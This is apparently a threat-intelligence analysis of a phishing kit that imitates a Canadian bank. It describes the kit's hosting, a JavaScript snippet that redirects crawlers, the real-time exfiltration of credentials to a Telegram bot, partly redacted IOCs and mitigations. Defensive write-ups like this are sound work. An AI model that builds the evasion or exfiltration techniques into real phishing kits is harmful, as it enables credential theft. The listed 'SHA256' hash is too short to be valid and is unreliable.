Introduction

Business Email Compromise (BEC) attacks cost organizations billions annually. In this analysis, we dissect a live phishing kit targeting financial services firms in North America, examining the attacker infrastructure, evasion techniques, and indicators of compromise.

Initial Discovery

The kit was discovered via passive DNS monitoring — a newly registered domain mimicking a major Canadian bank triggered our detection pipeline. The phishing page achieved a 94% visual similarity score against the legitimate site.

Infrastructure Analysis

The attacker used a layered infrastructure:

  • Cloudflare CDN for IP obfuscation
  • Bulletproof hosting in Eastern Europe
  • Telegram bot for real-time credential exfiltration
  • Dynamic DNS to rotate C2 endpoints

Evasion Techniques

The kit employed several anti-analysis measures:

// Bot detection logic found in kit
if (/bot|crawler|spider|headless/i.test(navigator.userAgent)) {
  window.location.href = https://legitbank.com;
}

Additionally, the kit checked for VPN/proxy IP ranges and redirected analysts away from the credential harvesting page.

Credential Exfiltration

Captured credentials were POSTed in real-time to a Telegram bot using the Bot API. The attacker received instant notifications for each victim, allowing for immediate account takeover before the victim realized they had been compromised.

IOCs

Domain: legitimatebank-secure-login[.]com
IP: 185.220.xxx.xxx
Telegram Bot ID: 5xxxxxxx:AAF...
SHA256 (kit.zip): a3f8c2e1d4b7f0e9c6a2b5d8f1e4c7a0

Mitigation

Organizations should implement DMARC/DKIM/SPF enforcement, deploy anti-phishing email gateways, and conduct regular user awareness training focusing on URL verification techniques.